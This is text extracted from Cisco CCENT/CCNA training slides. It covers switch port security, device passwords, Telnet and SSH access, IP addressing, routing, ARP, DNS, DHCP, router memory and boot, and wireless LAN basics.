SW2#show port-security int fast 0/3Port Security : EnabledPort Status : Secure-upViolation Mode : ShutdownAging Time : 0 minsAging Type : AbsoluteSecureStatic Address Aging : DisabledMaximum MAC Addresses : 1Total MAC Addresses : 1Configured MAC Addresses : 0Sticky MAC Addresses : 1Last Source Address : 00d0.58ad.4d51Security Violation Count : 0


• That sticky MAC address will also appear in the config.

interface FastEthernet0/3switchport mode access

switchport port-securityswitchport port-security mac-address sticky

switchport port-security mac-address sticky 00d0.58ad.4d51


• To illustrate what happens when a non-secure address hits that port, I've disconnected the host with the learned secure sticky address and replaced it with another host. What's the result?

SW2#show int fast 0/3

FastEthernet0/3 is down, line protocol is down (err-disabled)

44


• An err-disabled port! When you see err-disabled next to the line protocol message, that means that an error of some kind has shut that port down. In this case, that's the result of a non-secure MAC address hitting a port that had already learned another address as secure.


• A couple of important points regarding err-disabled ports:– The port LED will go dark – The port must be manually reopened with the

no shutdown command


• The reason for the port shutdown can be verified with show port-security interface. The port status is "Secure-shutdown", the violation mode is in the default of shutdown, and note that the last source address shown is not the one we saw earlier - that's the reason the port shut down.

45


SW2#show port-security int fast 0/3Port Security : EnabledPort Status : Secure-shutdownViolation Mode : ShutdownAging Time : 0 minsAging Type : AbsoluteSecureStatic Address Aging : DisabledMaximum MAC Addresses : 1Total MAC Addresses : 1Configured MAC Addresses : 0Sticky MAC Addresses : 1Last Source Address : 0010.7b39.c5e9Security Violation Count : 1


• If we want both this address and the previous one to be secure, we can change the port-security maximumvalue to 2 and then reopen the port.


SW2(config-if)#switchport port-security maximum 2SW2(config)#int fast 0/3SW2(config-if)#shutdownSW2(config-if)#no shutdownSW2(config-if)#^ZSW2#

4d10h: %LINK-5-CHANGED: Interface FastEthernet0/3, changed state to administratively down

4d10h: %LINK-3-UPDOWN: Interface FastEthernet0/3, c hanged state to down

4d10h: %LINK-3-UPDOWN: Interface FastEthernet0/3, c hanged state to up

4d10h: %LINEPROTO-5-UPDOWN: Line protocol on Interf ace FastEthernet0/3, changed state to up

46


• Verify the interface is indeed back up with show interface :


FastEthernet0/3 is up, line protocol is up (connected)


• Verify the changes to the port security scheme:

SW2#show port-security int fast 0/3Port Security : EnabledPort Status : Secure-upViolation Mode : ShutdownAging Time : 0 minsAging Type : AbsoluteSecureStatic Address Aging : DisabledMaximum MAC Addresses : 2Total MAC Addresses : 1Configured MAC Addresses : 0Sticky MAC Addresses : 1Last Source Address : 0010.7b39.c5e9Security Violation Count : 0


Video 4Common Router and Switch

Commands

47


Common Router and Switch Commands

• Physical Connections and Passwords• Telnet And SSH• User, Enable and Privilege Modes• Enable Password vs. Enable Secret• “privilege level 15”• Physical Side of Cisco Switches• Assigning an IP Address and Default Gateway To The Switch• Speed, Duplex, and “Interface Range”• Banners, “logging synch”, and “exec-timeout”• Keystroke Shortcuts and Manipulating History


• What I'm about to say is probably a little more true of a router than a switch, but there are two "problems" with the initial configuration of a Cisco device:– Some features that you do want to use will not be

enabled – Some features that you might not want to have

running will be running by default


line con 0line vty 0 4

loginline vty 5 15

login• This small, seemingly insignificant portion of the switch

configuration actually determines what passwords a user must enter in order to connect to the switch successfull y. When you do connect to a Cisco switch, you're going to do so in one of two ways:– By physically connecting a laptop to the switch – By logically connecting from a remote location via Telnet or SSH

48


• For a physical connection, you're going to need a rollover cable . This is typically a blue cable with an RJ-45 connector on one end and a DB-9 connector on the other end. The RJ-45 connector snaps into the Console port of the switch or router, and the DB-9 connector connects to your laptop -- maybe!


• Did you notice that we were not prompted for a pass word when connecting through the console port? That means that anyone with a laptop and a rollover cable can connect successfully to this switch - and we might n ot want that! Let's take another look at the password portion of our switch's configuration:

line con 0line vty 0 4

loginline vty 5 15

login


• To protect the switch's console port, it's the "line con 0" we need to be concerned with. If we're going to use a single password to protect the console port, we'll actually need two commands:– the password command (the one everyone

remembers) – the login command (the one a lot of people forget -

except you!)

49


• To review the methods available to connect to a Cisco router:– Physically connecting a laptop to the Console

port – Connecting from a remote location via Telnet

or SSH


• We're going to telnet from one Cisco router to another in this example, but there is one major rule that holds true for any Telnet configuration on a Cisco router or switch:

• You must configure a password on the VTY lines. Without a password on the VTY lines, no user will be able to telnet to a Cisco router or switch!


User, Enable, And Privilege Modes

• When you first connect to a Cisco router or switch via Telnet or SSH, by default you're going to be placed into user exec mode. This mode is indicated by the ">" symbol after the device name.

R1>

50


• To configure the router, we need to go to the next level, privileged EXEC mode (generally called "enable mode"). To get there, we need to enter the enable command in user exec mode. The prompt should change slightly...

R1>enableR1#


• Using an enable mode password is optional - unless you have users connecting via Telnet. (Thought I had forgotten about the Telnet discussion, didn't you? We're getting back to that in just a minute!)


• To recap– No password is required for connecting to the router

via the Console port, but it's recommended that you configure one.

– A password on the VTY lines is required to allow Telnet or SSH users to connect.

– For Telnet and SSH users to access enable mode, either an enable password must be configured OR the following command must be configured on the VTY lines.

51


• You may want incoming Telnet users to be placed directly into privileged exec mode without being prompted for an enable password To do so, configure the privilege level 15command on the VTY lines of the router or switch allowing the connections.


What's So Secure About Secure

Shell?

• Telnet's a great way to communicate remotely with routers and switches, but there's a problem - all of the data sent to the remote host, including passwords, is transmitted in clear text. Any would-be network intruder who intercepts the password transmission can then easily enter the network via Telnet, and then we're in real trouble!


• With SSH, we need to create a username / password database. it sounds complex, but it's not. I'll show you how to create one on a Cisco switch in just a moment. We could also set up an AAA server (Authentication, Authorization, and Accounting ) that would handle authentication. Setting up an AAA server is out of the scope of the CCENT and CCNA exams, but you should know the commands for setting up a Cisco switch to perform authentication via a local username/password database.

52


• We could use the username/password command to create a database strictly for Telnet if we wanted to, and the login local command would have the same effect. Where the Telnet and SSH configuration differ is that the SSH config requires the followin g where Telnet does not:– A domain name must be specified with the ip domain-name

command – A crypto key must be created with the crypto key generate rsa

command


• Green always means "good" • Amber indicates a problem if it doesn't

go away in a few seconds • If a host is connected to a switch port

and the LED is dark, that's usually really bad


• SYST, short for system. Green means the switch is on, no light means it isn't. :)

• If you see SYST go amber, that indicates a failed Power-On Self Test (POST), and you'll get a message indicating the reason for that failure in the conso le output. A failed POST indicates a serious problem with the switch, and the switch will not even attem pt to load an IOS. A typical POST problem is a broken fan - if you have no ventilation inside the switch, there's no reason for the switch to power up!

53


• RPS (Redundant Power Supply). Green indicates that the RPS is functioning correctly.

• STAT, short for status. When this is green, the port status lights are operational.

• DUPLEX, where green indicates a full-duplex port and an "off" light indicates a half-duplex port


• SPEED, where solid green indicates a 100 MBPS port, off indicates a 10 MBPS port, and flashing green indicates a Gigabit Ethernet port (1000 MBPS)Each individual port will have an LED as well.

• When you first connect a host's cable to a switch port, you should see it go amber for a few seconds while the speed and duplex are negotiated. If all goes well, the LED goes green. If the light stays amber, there's a problem with a setting on either t he host or the switch that needs to be resolved. (Real ly narrows it down, eh?)


• There's one other common issue that a lack of LEDs can help you track down very quickly. In the cabling section, I mentioned that crossover cables are used to connect two switches to create a trunk. When you connect two Cisco switches with a crossover cable, you should see the lights go amber for just a few seconds and then go green. If you don't see any lights for a few seconds, you can stop waiting - you're using straightthrough cables by mistake!

54


So What Are Those "logging synchronous" and "exec-timeout 0 0" Commands, Anyway?

• You might have noticed these two commands on the co nsole line:

line con 0exec-timeout 0 0logging synchronous

• I've been recommending these commands for years to CCNA and CCNP candidates putting their own home labs tog ether, but they can come in handy on the job as well. Let's take these commands one at a time, starting with the logging synchronous command.


R1(config)#int s0R1(config-if)#no shutR1(config-if)#^ZR1#so here i am4d04h: %SYS-5-CONFIG_I: Configured from console by consoletyp4d04h: %LINK-3-UPDOWN: Interface Serial0, changed state to uping and4d04h: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to upi've been interrupted quite badly!4d04h: %LINEPROTO-5-UPDOWN: Line protocol on Interface Serial0, changed state to down


• By configuring the logging synchronous command on the console port, you're telling the router to hold such messages until it detects no input from the keyboard and no other output from the router, such as a show command's output.

55


• One of my favorites is the up arrow , which will show you the last command you entered. If you continue to hit the up arrow, you'll continue to go through the command history. <CTRL-P> does the same thing.

• As you might expect, the down arrow brings you one command up in the command history. It's a good key to use when you use the up arrow too fast. :) < CTRL - N > does the same thing.


• < CTRL - A > takes the cursor all the way to the front of your current command; < CTRL -E > takes the cursor all the way to the end of your current command.

• Want to move around on a per-character basis in your current command without deleting characters? Use the left arrow or < CTRL - B > to move backward one character, and use the right arrow or < CTRL - F > to move forward one character.


• <CTRL - D > deletes one character. You can do the same thing with the BACKSPACE key.

• < ESC - B > moves back one word in the current command.

• < ESC - F > moves forward one word in the current command.

56


Video 5IP Addressing And The

Routing Process


IP Addressing and the Routing

Process

• IP Addressing and Binary Conversions• IP Address Classes• Private IP Address Ranges• Intro to the Routing Process • Keeping Subnets On One “Side” of the

Router


• If you've worked as a network admin for any length of time, you're already familiar with IP addresses. Every PC on a network will have one, as will other devices such as printers. The term for a network device with an IP address is host , and I'll try to use that term as often as possible to get you us ed to it!

• The PC...err, the host I'm creating this document on has an IP address, shown here with the Microsoft command ipconfig .

57


• First, we'll convert the IP address 192.168.1.100 to a binary string. The format that we're used to seeing IP addresses take - like the 192.168.1.100 shown here - is often called a dotted decimal address, since the values are in decimal and there are dots separating the decimals. (Clever, eh?)


• If you know the basics of binary and decimal conversions, AND practice these skills diligently, you can answer any subnetting question Cisco asks you.


• I'll go ahead and show you the entire binary string for the IP address 192.168.1.100 below, and the subnet mask is expressed in binary directly below it.

192.168.1.100 = 11000000 10101000 00000001 01100100

255.255.255.0 = 11111111 11111111 11111111 00000000

58


• Way back in the ancient times of technology -September 1981, to be exact - IP address classes were defined in RFC 791. If you'd like to read the actual RFC, you can find it quickly using that numb er and your favorite search engine.

• RFCs are Requests For Comments , which are technical proposals and/or documentation. Not always exciting, but it's well worth reading the RF C that deals with the subject you're studying. Advanced technical exams occasionally like to ask about RFC numbers for a particular protocol or network service


• To earn your CCENT and CCNA certifications, you've got to know these address classes and be able to identify what class an IP address belongs to. Here are the three ranges of addresses that can be assigned to hosts:– Class A: 1 - 126 – Class B: 128 - 191 – Class C: 192 - 223


• The following classes are reserved and cannot be assigned to hosts:– Class D: 224 - 239. Reserved for multicasting, a topic

not covered on the CCENT or CCNA exams. – Class E: 240 - 255. Reserved for future use, also

called "experimental addresses". – Any address with a first octet of 127 is reserved for

loopback interfaces. This range is *not* for Cisco router loopback interfaces, though.

59


• Class A:– Default network mask: 255.0.0.0 – Default number of network bits: 8 – Default number of host bits: 24

• Class B:– Default network mask: 255.255.0.0 – Default number of network bits: 16 – Default number of host bits: 16

• Class C:– Default network mask: 255.255.255.0 – Default number of network bits: 24 – Default number of host bits: 8


• We worked just a bit with the network and host bits earlier in this section, and we're going to work wi th them a lot more in the subnetting sections later in the course. For now, make sure that you know....– How to identify the class of an IP address – Which addresses can be assigned to hosts (Class A, B, C) – Which addresses cannot be assigned to hosts (Class D, E, any

address beginning with 127) – The default network mask, network bits, and host bits for Class

A, B, and C addresses


• Address classes A, B, and C all have their own reserved range of addresses. You should be able to recognize an address from any of these ranges immediately .– Class A: 10.0.0.0 - 10.255.255.255– Class B: 172.16.0.0 - 172.31.255.255

– Class C: 192.168.0.0 - 192.168.255.255

• RFC 1918 Private Addresses

60


• You should be ready to identify those ranges in that format, or with the dotted decimal masks, or with prefix notation. More about prefix notation later in this section.– Class A: 10.0.0.0 255.0.0.0, or 10.0.0.0 /8 – Class B: 172.16.0.0 255.240.0.0, or 172.16.0.0 /12

– Class C: 192.168.0.0 255.255.0.0, or 192.168.0.0 /16


• Let's take another look at a PC's ipconfig output.

C:\>ipconfigWindows IP ConfigurationEthernet adapter Local Area Connection:

IP Address. . . . . . . . . . . . : 192.168.1.100

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1


• When this host is ready to send data, there are two and only two possibilities:– The destination IP address is on the

192.168.1.0 255.255.255.0 network – It's on another network

61


• If the destination is on the same subnet as the host, the packet's destination IP address will be that of the destination host. In the following example, this PC is sending packets to 192.168.1.15, a host on the same subnet, so there is no need for the router to get involved. In effect, those packets go straight to 192.168.1.15.


• If 192.168.1.100 wants to send packets to the host at 10.1.1.5, the sending host knows it's not on the same subnet as 10.1.1.5. In that case, the host will send the packets to its default gateway - in this case, the router's ethernet0 interface. The host is basically saying "I have no idea where this address is, so I'll send it to my default gateway and let that device figure it out."


• When a router receives a packet, there are three possibilities regarding its destination:– Destined for a directly connected network – Destined for a non-directly connected network that

the router has an entry for in its routing table – Destined for a non-directly connected network that

the router does not have an entry for

62


R1#show ip route

Codes: C - connected, S - static

Gateway of last resort is not set

C 20.0.0.0/8 is directly connected, Ethernet1



• Also note that you don't see the mask expressed as "255.0.0.0" - you see it as "/8" instead. This is cal led prefix notation , and the number simply represents the number of 1s at the beginning of the network mask when it's expressed in binary. That "/8" is pronounced "slash eight".

255.0.0.0 =binary string 11111111 00000000 00000000 00000000 = /8


R1#show ip route


Gateway of last resort is not set



63


• Static routes are created with the ip route command.

R1(config)#ip route 30.0.0.0 255.0.0.0 ethernet1


• The routing table now displays a route for the 30.0.0.0 /8 network. The letter "S" indicates a static route.

R1#show ip route




S 30.0.0.0/8 is directly connected, Ethernet1


Video 6ARP, DNS and DHCP

64


ARP, DNS and DHCP

• One Destination, Two Destination Addresses• DNS• The ARP Process• Routers, Broadcasts, and Proxy ARP• The DHCP Process • Configuring DHCP on a Cisco Router With

SDM


• As network admins, we spend a lot of time concerning ourselves with IP addresses - assigning them, filtering them, etc. We don't think about MAC addresses that often, but data going from Host A to Host B must have a destination IP address for Host B and a destination MAC address as well.


• To get these two required destination addresses, Host A will use two separate protocols:– Domain Name System (DNS) for the IP address – Address Resolution Protocol (ARP) for the MAC address

• Host A will require the IP address first, since it must know the IP address of the remote host in order for the ARP process to work properly. Let's take a quick look at the DNS process.

65


• Host A will know the computer name of Host B - for this discussion we'll assume that name to be "hostb". Now it needs an IP address and a MAC address for that hostname, and DNS will help it get that IP address. The DNS process is very simple. Each host will have the IP address of a DNS server, and a host needing the IP address of another host will send a DNS Request to the DNS server.


• The natural question is "How does Host A know the IP address of the DNS server in the first place?" That happens in one of two ways:– The DNS server address is hard-coded on Host A – The DNS server address was learned via DHCP

• We're going to take a look at DHCP later in this section, but here's the partial output of ipconfig /all on a Windows PC using DHCP. The DNS server IP addresses are in bold.


C:\>ipconfig /allWindows IP Configuration

Host Name . . . . . . . . . . . . : Primary Dns Suffix . . . . . . . :Node Type . . . . . . . . . . . . : Hybrid

Ethernet adapter Local Area Connection:Connection-specific DNS Suffix . :Description . . . . . . . . . . . : Intel(R) 82562V 10/100 Network

ConnectionPhysical Address. . . . . . . . . : 00-17-31-F7-03- B2Dhcp Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesIP Address. . . . . . . . . . . . : 192.168.1.100Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.1.1DHCP Server . . . . . . . . . . . : 192.168.1.1DNS Servers . . . . . . . . . . . : 68.87.73.242

68.87.71.226Lease Obtained. . . . . . . . . . : Monday, October 08, 7:23:17 AMLease Expires . . . . . . . . . . : Tuesday, Octobe r 09, 7:23:17 AM

66


• In our current network, we have a DNS server that took care of the hostname-IP address resolution, but now we need the MAC address of Host B, and there is no ARP server on the network. Instead, the ARP process uses a series of broadcasts and replies.


• Host A is the host needing a MAC address of a remote device, so it'll be Host A that sends out the initial ARP Request. This request is a Layer 2 broadcast, meaning....– The source MAC address will be that of Host A – The destination MAC address will be ff-ff-ff-ff-ff-ff– The source IP address will be that of Host A – The destination IP address will be that of Host B

(learned via DNS)


• As network admins, we're always interested in limit ing the number of broadcasts on our network. Along those lin es, hosts build ARP caches that they consult before sending out ARP Requests. These caches contain an IP address - MA C address mapping table such as the one shown here on a Windows PC with the command arp -a :

C:\>arp -a

Internet Address Physical Address Type

10.1.1.2 bb-bb-bb-bb-bb-bb dynamic

67


• After learning Host B's IP and MAC addresses (MAC addresses are also called "physical addresses" because they physically exist on the network card), Host A would enter them into its ARP cache. The next time Host A needs to send data to Host B, the information needed to do so is right there in the ARP cache and no ARP Request needs to be sent.


• In that example, all of the devices were on the same physical cable. That's good for an example, but more likely we're going to have something like this:


• The switch does not impact the ARP process at all. Why? Because switches forward broadcasts, and that's just what the ARP Request is as indicated by its destination MAC address of ff-ff-ff-ff-ff-ff. The switch will send a copy of that ARP Request out every single port except the one it came in on.

68


• If Host A sends an ARP Request for Host B's MAC address, we know the switch will forward it, because switches forward broadcasts. The problem comes in with the router, because routers do not forward broadcasts. Instead, the router will use proxy ARP to answer the ARP Request with the MAC address of the router interface that received the original Request.


• Interestingly enough, Host A has no idea that the MAC address it received in the ARP Response is actually not that of Host B, but rather that of the Ethernet0 interface of the router. All Host A knows is that it sent an ARP Request and got a Response. Now when Host A sends data to Host B, the data will have the following destinations:– IP destination address is Host B's IP address – MAC destination address is the one assigned to the

router's E0 interface


• There are also other forms of ARP that operate in today's networks, such as Reverse ARP and Inverse ARP. Those are not protocols you need to know for your CCENT studies -- you'll see them during your CCNA studies. For now, and for the CCENT exam, make sure you know how ARP operates, what it does, and when proxy ARP needs to be used - and that's when there is a router between the two involved hosts.

69


• A host's ability to send data to all the required destinations requires quite a bit of information. The host needs to know the following at a minimum...– What's my IP address? – What's my network mask?

– What are the IP addresses of the DNS servers? – What's my default gateway?


• How do we get all of this information to and on our network hosts? We've got two options:– Visit each workstation and configure the information

manually – Enable each workstation for DHCP

• And sooner or later, some of that information is going to change and the hosts will need to know about these changes.


• If you previously hard coded the information on all of the hosts, you'll now have to go out and visit ever y workstation again and change the information manually.

• If you used DHCP to begin with, you now just have t o change the information on the DHCP server.

• DHCP is starting to sound pretty good! When the choice is visiting the hundreds or thousands of hosts on a typical network manually or using DHCP to dynamically handle IP address assignment information, there really is no choice.

70


• There are four basic steps that allow a host (the DHCP Client) to acquire all of this information from a DHCP Server. The Client begins the process by sending a DHCP Discover message out. This message is a broadcast, so it will not be forwarded by routers.


• Any DHCP Server that receives that message will respond with a DHCP Offer. The Offer contains the following:– The IP address the DHCP Server is offering to the

Client – The network mask the DHCP Server is offering to the

Client – The amount of time the Client can keep this

information if the Offer is accepted (the lease) – The IP address of the DHCP Server that is making

the offer


• Since the original DHCP Discovery sent by the host is a broadcast, more than one DHCP Server may see it and respond with an Offer, as shown above. In this case, the host will respond to the first Offer it receives with a DHCP Request.

• The Request has the IP address of the DHCP Server that sent the accepted Offer. When the other DHCP Server(s) see that their Offer was not accepted, th ey put the offered IP address back into their address pools. This DHCP Request is also a broadcast.

71


• You can see the IP address a host has been assigned, along with the lease length and other information, with ipconfig /all . You can verify that the host is running DHCP with this command as well.


C:\>ipconfig /all

Network ConnectionPhysical Address. . . . . . . . . : 00-17-31-F7-03- B2Dhcp Enabled. . . . . . . . . . . : YesAutoconfiguration Enabled . . . . : YesIP Address. . . . . . . . . . . . : 192.168.1.100Subnet Mask . . . . . . . . . . . : 255.255.255.0Default Gateway . . . . . . . . . : 192.168.1.1DHCP Server . . . . . . . . . . . : 192.168.1.1DNS Servers . . . . . . . . . . . : 68.87.73.24

68.87.71.22Lease Obtained. . . . . .. : Monday, October 08, 20 0x 7:23:17 AMLease Expires . . . .. . . : Tuesday, October 09, 2 00x 7:23:17 AM


• Many Cisco router models can be configured to operate as DHCP servers. On some models, we're limited to using the command-line interface to writ e the DHCP config, and I'll be the first to say that can be little tricky. Cisco is making a big push toward GUI-based tools, and the GUI we'll look at here is the Security Device Manager (SDM). This tool makes DHCP configurations a breeze!

• In this lab, we'll use SDM to configure a Cisco rou ter as a DHCP server, and then test that configuration.

72


Video 7Memory Components And

Config Files


Memory Components And

Config Files

• ROM, RAM, NVRAM, And Flash• The Boot Process• Setup Mode• Startup And Running Configuration Files• The COPY Command• IOS Upgrading• The Configuration Register


• ROM: Read-Only Memory. ROM stores the router’s bootstrap startup program, operating system software, and power-on diagnostic test programs (POST).

• Flash Memory: Generally referred to simply as “flash”, the IOS images are held here. Flash is erasable and reprogrammable ROM. Flash memory content is retained by the router on reload.

73


• RAM: Random-Access Memory . Stores operational information such as routing tables and the runningconfiguration file. RAM contents are lost when the router is powered down or reloaded. By default, routers look here first for an Internetwork Operati ng System (IOS) file during boot.

• NVRAM: Non-volatile RAM . NVRAM holds the router’s startup configuration file. NVRAM contents are not lost when the router is powered down or reloaded.


• Some important comparisons:– RAM contents are lost on reload, where NVRAM and

Flash contents are not. – NVRAM holds the startup configuration file, where

RAM holds the running configuration file. • We'll talk about the startup and running

configuration files later in this section. Let's take a look at the boot process of a Cisco router, and then talk about the dreaded Setup Mode!


• When a Cisco router powers up, it first runs a series of POSTs (Power-On Self Test). A POST is a series of diagnostic tests designed to verify the basic operation of the network interfaces, memory, and the CPU.

74


• POSTs are particularly effective at detecting major problems early in the boot process, such as a broken fan. If the POST detects such a problem (usually called an "environmental factor") that would cause the router or switch to overheat after booting, the POST will fail, give you a clear message as to why the POST failed, and will then stop the boot process.

• But let's speak positively here!


• After the router passes the POST, it looks for a source from which to load a valid Internetwork Operating System (IOS) image. The router has three sources from which it can load an IOS image, and it's a good idea to know these sources and the order in which the router will look in each for tha t image:1. Flash memory (the default).2. A TFTP server. (Trivial File Transfer Protocol)3. Read-Only Memory (ROM)


• To change that order, a change must be made to the configuration register . It's similar to the Microsoft Registry in that you should never change this value unless you are sure of the result.

• Once the IOS is found, the router looks for a valid startup configuration file. By default, the router will look for the startup configuration file in Non-vola tile RAM (NVRAM). If there's no startup file there, the router looks for a TFTP Server that has a startup f ile.

75


• If no valid startup configuration file is found, the router enters setup mode , where the router runs the system configuration dialogue , a series of questions involving basic router setup.


• Believe it or not, when you take a Cisco router or switch out of the box and boot it up for the first time, it's dumber than a bag of rocks.

• Well, not quite. It's not dumb, you just haven't tol d it anything yet. A router doesn't magically know what IP addresses you want to assign to its interfaces, what security features you do and do not want to run, or any of your other preferences! We've got two ways to tell it these things:– Setup Mode – Manually configuring all of this information at the Command-Line

Interface (CLI)


• We actually have two configuration files running on a router at any time, the startup-config and running-config files. Most of the time they're the same thing, but there is an important difference between the two when you've configured the router but have not yet saved that new configuration.

76


• As you go through your Cisco studies and your Cisco career, you'll use the copy command more often than you might think. It's a good idea to remember the command syntax:– The first location is where you're copying from– The second location is where you're copying

to


• You can see that the commands copy run start and copy start run are going to have vastly different meanings. That's good to keep in mind for both your exams and working on production networks!– copy run start -- Copying the running config over the

startup config– copy start run -- Copying the startup config over the

running config


• And why would you ever need them? I've seen three different situations where these backups came in handy. In order of probability:– Network attackers changing or deleting the config – An honest mistake made by a network admin

– Just as any file can become corrupt over time, so can a startup-config file

77


• On occasion, the trickiest part of changing a route r's IOS image is actually getting the image you want! You can download new IOSes from Cisco's website, but a Cisco Connection Online (CCO) login is not enough. The rules change as to who can and cannot download IOS images, so I won't list those rules here, but you can find out quickly by searchi ng Cisco's site. Just keep in mind that you can't just go out to Cisco's website to download the latest IOS image for your router on a whim.


• If you have to perform an IOS upgrade, you might be tempted to do so remotely rather than physically visit the client site - until you see the following warning! I've telnetted into a router and issued the copy tftp flash command, and that means we're copying from a TFTP server to the router's Flash.


• Here's the warning I received, and I've bolded the very, very important part:

BRYANT_AS_5#copy tftp flash**** NOTICE ****

Flash load helper v1.0This process will accept the copy options and then terminatethe current system image to use the ROM based image for the copy.Routing functionality will not be available during that time.If you are logged in via telnet, this connection wi ll terminate.Users with console access can see the results of th e copy

operation.---- ******** ----

[There are active users logged into the system]Proceed? [confirm]

78


• As the new IOS is loaded, you'll see a series of exclamation points. It looks like a massive ping, as you can end up with screens of "!". If those exclamation points stop for a few seconds, that's okay, but if they stop and don't restart, there's a problem with the copy.


• Once you do finish copying the new IOS to Flash, this is one of the rare occasions where you have to reload the router for the change to take effect. Before copying to Flash, though, run show flash to see how much room you have left in Flash! The following output indicates that we don't have much room left on this particular router, so copying a new IOS image to this router without deleting the current one is just about impossible.


• This has always been an awkward subject for me to teach and write about, because I feel like I'm teaching you something and then telling you never to use the knowledge!

• One day, you will have to change the config registe r, most likely to perform a password recovery. I will just give this warning one time: If you change the register to an incorrect value and then reload the router, you can cripple the router and even Cisco can't bring it back.

79


• To review these common configuration register settings:– 0x2102: The default. Router looks for a

startup configuration file in NVRAM and for a valid IOS image in Flash.

– 0x2142: NVRAM contents are bypassed, startup configuration is ignored.

– 0x2100: Router boots into ROM Monitor mode.


• A real-world reminder: When you change the configuration register value to perform password recovery, don't forget to change it back and then reload the router!


Video 8Intro to Wireless Networks

(WLANs)

80


Intro to Wireless Networks (WLANs)

• Wireless Network Types• Standards and Ranges• Spread Spectrum• Antenna Types• CA vs. CD• SSIDs and MAC Address Authentication• WEP, WPA, and WPA2


• Wireless networks are created by configuring Wireless Access Points (WAP or AP, depending on documentation). If you're connecting to the Internet or your company's network from a hotel or restaurant, you're connected to a lily pad network.

• Unlike the physical networks we've discussed previously in this course, the WAPs in a lily pad network can be owned by different companies. The WAPs create hotspots where Internet access is available to anyone with a wireless host - and hopefully, a username and password is required as well!


• WAPs are not required to create a wireless network. In an ad hoc WLAN("wireless LAN"), the wireless devices communicate with no WAP involved. Ad hoc networks are also called Independent Basic Service Sets (iBSS or IBSS, depending on whose documentation you're reading).

81


• A much more common wireless configuration is an infrastructure WLAN , where a WAP is used to allow multiple devices to connect to the wired network. Al l communications in an infrastructure WLAN must go through a wireless access point (AP).

• There are two kinds of infrastructure WLANs, with the most common being the following topology. While a Basic Service Set (BSS) will have a single AP, Extended Service Set WLANs(ESS), have multiple access points.


• If you've ever used a wireless network while traveling, you were on an ESS. Such a network uses multiple APs to create overlapping areas of coverage , called cells . While your signal may occasionally get weak near the point of overlapping, the ESS allows roaming users to hit the network at any time. (We hope!)


• We went over three different service set types in that section, so to review:– Independent Basic Service Sets have no APs; the few

wireless devices involved interact directly. – Basic Service Sets have a single AP. – Extended Service Sets have multiple APs, which

allow for a larger coverage area than the other two types and also allow roaming users to fully utilize the WLAN.

82


• The standards listed here are all part of the 802.1 1x standards developed by the IEEE. IEEE uses the 802.11 standard to define Wi-Fi overall, but it's a good idea to know the stats for the following.

• 802.11a has a typical data rate of 25 MBPS, but can reach speeds of 54 MBPS. Indoor range is 100 feet. Operating frequency is 5 GHz.

• 802.11b has a typical data rate of 6.5 MBPS, but can reach speeds of 11 MBPS. Indoor range is 100 feet. Operating frequency is 2.4 GHz.


• 802.11g has a typical data rate of 25 MBPS, a peak data rate of 54 MBPS, and an indoor range of 100 feet. Operating frequency is 2.4 GHz. 802.11b and 802.11g are compatible to the point where many wireless routers and cards that use these standards are referred to as "802.11b/g", or just "b/g".

• 802.11n has a typical data rate of 200 MBPS, a peak data rate of 540 MBPS, and an indoor range of 160 feet. Operating frequency is either 2.4 GHz or 5 GHz .


• Infrared Wireless• Infrared wireless offers a high data rate,

but a very short range - generally too short to be practical.

83


• It's a very good idea to have those maximum speeds, ranges, and frequencies memorized for the exam. For real-world wireless networks, always keep in mind that maximum speeds and ranges are theoretical at best. That's particularly true with wireless networks, which can suffer from unusual and unexpected sources, such as weather, signal attenuation, and popcorn.


Popcorn?

• You can have trouble with 802.11g from a highly unexpected source. Microwave ovens also share the 2.4 GHz band, and the presence of a microwave in an office can actually cause connectivity issues. (And you thought they were just annoying when people burn popcorn in them!) Solid objects such as walls and other buildings can disturb the signal in any bandwidth. Some wireless phones cause the same problem.


Spread Spectrum

• This is another one of those "the name is the recipe" terms. Spread spectrum refers to a method of spreading a signal over a range, or spectrum, or frequencies. One popular method is frequency-hopping spread spectrum (FHSS), where the sender and receiver agree on the range of frequencies to use, and during the transmission the signal will be sent over this range.

84


• DSSS (Direct Sequence Spread Spectrum) doesn't have the signal hop around between frequencies, but instead spreads the signal over the entire range of frequencies at once. 11.b, 11.g, and 11.n use DSSS.

• OFDM (Orthogonal Frequency Division Multiplexing) splits the signal and sends the signal fragments over different frequencies at the same time. .11a uses OFDM.


• Now, why do we go through all this? There are several good reasons to spread a signal:– increased resistance to noise – allows sharing of a frequency band – more difficult to intercept


Antenna Types

• A Yagi antenna (technically, the full name is "Yagi-Uda antenna") sends its signal in a single direction, which means it must be aligned correctly and kept that way. Yagi antennas are sometimes called directional antennas, since they send their signal in a particular direction. In contrast, an Omni antenna sends a signal in all directions.

85


• Like some other topics we've covered in this course, both of these are known by several different names. Yagis are also known as point-to-point and directional antenna; Omni antennas are also known as omnidirectional and point-to-multipoint antenna.


• Both Yagi and Omni antennas have their place in wireless networks. The unidirectional signal a Yagi antenna sends makes it particularly helpful in bridging the distance between WAPs. The multidirectional signal sent by Omni antennas help connect hosts to WAPs, including roaming laptop users -- like the ones who connect to the Net while eating lunch!


• Ethernet has CSMA/CD, and wireless networking has CSMA/CA, Carrier Sense Multiple Access with Collision Avoidance. CSMA/CA works much the same as CSMA/CD…– a host that wants to transmit must listen first to see if another

host is transmitting – if the channel is idle, the host invokes a random timer. When

that timer expires, the host listens one more time and then transmits. (A lot more listening with CSMA/CA!)

– if the channel is busy, the host cannot transmit

86


• So what's the real difference between CSMA/CD and CSMA/CA? CA is used on wireless networks, and jam signals will not be sent over a wireless network. Collisions are not detected on a wireless network, they can only be avoided, so we use CSMA/CA instead of CD.

• Another difference - while Ethernet is capable of fu ll-duplex (simultaneously sending and receiving data), wireless clients are limited to half-duplex.


Service Set Identifier (SSID)

• When you configure a name for your WLAN, you've just configured a SSID. The SSID theory is simple enough - if the wireless client's SSID matches that of the access point, communication can proceed. The SSID is case-sensitive and it has a maximum length of 32 characters.


• A laptop can be configured with a null SSID, resulting in the client basically asking the AP for its SSID; if the AP is configured to broadcast its SSID, it will answer and communication can proceed.

• If that broadcasting is disabled, as it often is, the SSID must be statically defined on the client as shown in the previous example.

87


MAC Address Authentication

